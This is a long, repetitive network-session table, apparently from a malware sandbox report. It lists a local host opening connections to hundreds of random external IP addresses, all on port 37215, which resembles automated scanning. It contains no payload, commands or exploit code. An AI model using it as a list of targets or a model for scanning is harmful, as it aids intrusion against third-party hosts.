                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7258192.168.2.1547740102.97.51.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7259192.168.2.1539772181.23.85.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7260192.168.2.1545436222.125.27.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7261192.168.2.1534716121.150.172.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7262192.168.2.1546356197.250.215.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7263192.168.2.153789231.157.42.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7264192.168.2.1547806156.198.138.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7265192.168.2.155053441.133.252.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7266192.168.2.1551336102.114.65.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7267192.168.2.155451641.211.49.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7268192.168.2.1537086156.9.69.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7269192.168.2.1545512138.115.205.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7270192.168.2.1538350181.228.125.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7271192.168.2.1552124222.30.144.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7272192.168.2.154165094.204.80.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7273192.168.2.153641831.17.65.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7274192.168.2.153739837.108.237.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7275192.168.2.154224437.76.29.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7276192.168.2.1554964186.43.195.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7277192.168.2.153551241.18.154.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7278192.168.2.155416241.135.14.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7279192.168.2.154233245.75.170.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7280192.168.2.1537838121.248.119.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7281192.168.2.1545406156.106.182.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7282192.168.2.1542876157.202.78.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7283192.168.2.1558124222.53.182.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7284192.168.2.153325894.155.251.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7285192.168.2.1553566222.100.25.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7286192.168.2.1547880157.159.110.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7287192.168.2.1545764138.228.133.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7288192.168.2.153440245.233.132.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7289192.168.2.155500637.119.66.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7290192.168.2.154894431.165.220.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7291192.168.2.1543394197.57.190.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7292192.168.2.153669894.149.243.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7293192.168.2.1556898197.153.213.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7294192.168.2.1551486156.123.106.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7295192.168.2.1547978190.9.243.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7296192.168.2.154617841.117.94.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7297192.168.2.1559776197.68.174.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7298192.168.2.1546834138.42.225.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7299192.168.2.1544564222.96.85.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7300192.168.2.155686694.77.206.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7301192.168.2.1535654181.220.162.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7302192.168.2.1550018121.169.242.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7303192.168.2.1544308122.225.104.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7304192.168.2.1548418190.145.155.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7305192.168.2.155135445.51.79.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7306192.168.2.1557378222.73.228.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7307192.168.2.1534508121.93.31.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7308192.168.2.1549964222.177.110.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7309192.168.2.154958245.12.183.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7310192.168.2.1552650186.137.34.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7311192.168.2.154434494.201.250.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7312192.168.2.154748694.76.9.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7313192.168.2.154811637.219.118.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7314192.168.2.1549810138.239.73.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7315192.168.2.154803645.189.62.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7316192.168.2.1541936157.87.227.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7317192.168.2.1555668138.175.209.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7318192.168.2.1549934186.239.64.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7319192.168.2.154784445.2.88.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7320192.168.2.1552100190.15.64.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7321192.168.2.1557206168.189.38.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7322192.168.2.155721831.14.239.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7323192.168.2.1543068121.188.110.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7324192.168.2.1547620181.157.9.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7325192.168.2.153672045.225.226.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7326192.168.2.1550336122.216.45.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7327192.168.2.1560136197.27.184.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7328192.168.2.1537366190.246.215.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7329192.168.2.153958245.228.98.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7330192.168.2.155269245.209.251.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7331192.168.2.1540234222.234.106.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7332192.168.2.1533006190.51.118.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7333192.168.2.1549010186.243.233.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7334192.168.2.1532780202.84.107.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7335192.168.2.1533170181.144.93.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7336192.168.2.1542082222.69.147.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7337192.168.2.1534078121.54.186.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7338192.168.2.1555634122.20.215.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7339192.168.2.155490094.44.114.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7340192.168.2.154578637.171.140.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7341192.168.2.1536074102.206.102.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7342192.168.2.153542045.155.6.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7343192.168.2.1550498122.224.108.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7344192.168.2.1552432156.27.148.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7345192.168.2.1544174190.3.211.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7346192.168.2.1560386102.16.211.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7347192.168.2.1554424121.197.151.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7348192.168.2.153973437.95.51.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7349192.168.2.1534624181.183.130.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7350192.168.2.1554774190.33.103.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7351192.168.2.1552920102.197.31.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7352192.168.2.1555678186.111.246.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7353192.168.2.153807841.39.182.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7354192.168.2.1560962186.216.94.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7355192.168.2.1534838190.66.10.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7356192.168.2.156070837.98.10.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7357192.168.2.1555850186.217.202.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7358192.168.2.154010437.211.237.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7359192.168.2.1535972102.250.166.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7360192.168.2.1553928222.53.230.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7361192.168.2.153726845.231.90.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7362192.168.2.153565245.41.133.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7363192.168.2.155174837.27.142.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7364192.168.2.1536558157.189.129.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7365192.168.2.1548064181.71.161.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7366192.168.2.1550220102.212.24.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7367192.168.2.1533882138.165.155.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7368192.168.2.1548446121.178.102.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7369192.168.2.1550646190.194.91.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7370192.168.2.1548570102.13.181.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7371192.168.2.1535632121.147.243.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7372192.168.2.1559524197.115.11.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7373192.168.2.153345072.48.185.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7374192.168.2.155060494.104.43.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7375192.168.2.1533768190.12.120.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7376192.168.2.1546648190.182.234.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7377192.168.2.1549614102.251.23.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7378192.168.2.1552636122.201.64.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7379192.168.2.1548252102.247.71.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7380192.168.2.1553838222.44.76.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7381192.168.2.1532896156.159.64.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7382192.168.2.155002237.211.19.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7383192.168.2.155098037.210.126.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7384192.168.2.155737241.0.58.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7385192.168.2.1544238157.37.153.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7386192.168.2.154085094.78.239.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7387192.168.2.1542368222.153.39.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7388192.168.2.154530045.121.85.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7389192.168.2.1542778102.109.1.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7390192.168.2.1553422122.196.71.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7391192.168.2.155057094.218.4.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7392192.168.2.1560284197.104.42.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7393192.168.2.1559378102.235.214.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7394192.168.2.1534244190.39.117.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7395192.168.2.1555330156.72.67.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7396192.168.2.1549942190.185.195.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7397192.168.2.155673045.46.174.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7398192.168.2.154561694.73.219.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7399192.168.2.1545658222.151.18.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7400192.168.2.1543896186.127.16.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7401192.168.2.155540037.186.178.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7402192.168.2.1554604186.12.104.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7403192.168.2.155293437.96.125.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7404192.168.2.155422431.41.34.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7405192.168.2.1557992222.84.79.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7406192.168.2.1555076197.21.46.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7407192.168.2.1557634122.63.87.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7408192.168.2.155482231.88.42.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7409192.168.2.1549894197.188.244.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7410192.168.2.1543192157.235.216.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7411192.168.2.1556482102.78.3.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7412192.168.2.1560016181.205.177.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7413192.168.2.1534888102.217.6.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7414192.168.2.1553964181.64.82.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7415192.168.2.1534926156.214.34.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7416192.168.2.155311441.24.91.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7417192.168.2.155545031.30.158.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7418192.168.2.154557045.0.247.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7419192.168.2.1557650197.32.22.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7420192.168.2.1553508121.129.197.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7421192.168.2.1557150122.74.51.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7422192.168.2.1532814121.150.52.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7423192.168.2.154966641.47.224.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7424192.168.2.155532037.176.133.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7425192.168.2.153699676.175.199.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7426192.168.2.1543974213.56.94.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7427192.168.2.1537610222.37.100.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7428192.168.2.1551968157.57.111.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7429192.168.2.155857441.156.231.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7430192.168.2.154723631.88.11.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7431192.168.2.154367435.176.9.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7432192.168.2.154134445.135.5.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7433192.168.2.1538234212.124.97.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7434192.168.2.155114845.212.243.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7435192.168.2.153895041.65.238.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7436192.168.2.1557764156.208.36.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7437192.168.2.1557426157.3.65.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7438192.168.2.1542402122.130.85.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7439192.168.2.1540052122.109.230.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7440192.168.2.155860045.245.184.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7441192.168.2.153278037.152.4.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7442192.168.2.153498831.6.240.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7443192.168.2.1552970222.89.214.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7444192.168.2.1549206156.125.6.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7445192.168.2.1542112197.91.63.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7446192.168.2.1560412222.63.92.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7447192.168.2.1559278122.31.188.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7448192.168.2.1556794157.57.229.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7449192.168.2.1534542197.64.229.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7450192.168.2.154926045.178.65.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7451192.168.2.1535864157.55.234.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7452192.168.2.1541682157.163.246.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7453192.168.2.155515645.6.251.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7454192.168.2.153559237.88.20.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7455192.168.2.1539514190.144.39.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7456192.168.2.1549876157.56.180.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7457192.168.2.153862845.83.254.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7458192.168.2.1545956181.74.178.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7459192.168.2.1553402197.215.120.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7460192.168.2.1544048157.134.56.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7461192.168.2.1547926122.138.117.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7462192.168.2.1555576186.16.123.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7463192.168.2.1557780138.119.180.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7464192.168.2.1553782181.5.120.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7465192.168.2.1545578157.31.0.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7466192.168.2.1549160190.240.183.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7467192.168.2.154728841.250.173.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7468192.168.2.1536202122.167.14.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7469192.168.2.1543210138.250.52.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7470192.168.2.1554484122.145.79.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7471192.168.2.155090894.179.51.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7472192.168.2.153723845.79.123.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7473192.168.2.155902837.9.135.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7474192.168.2.1550992122.1.10.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7475192.168.2.155145853.65.223.19337215
                                              TimestampBytes transferredDirectionData


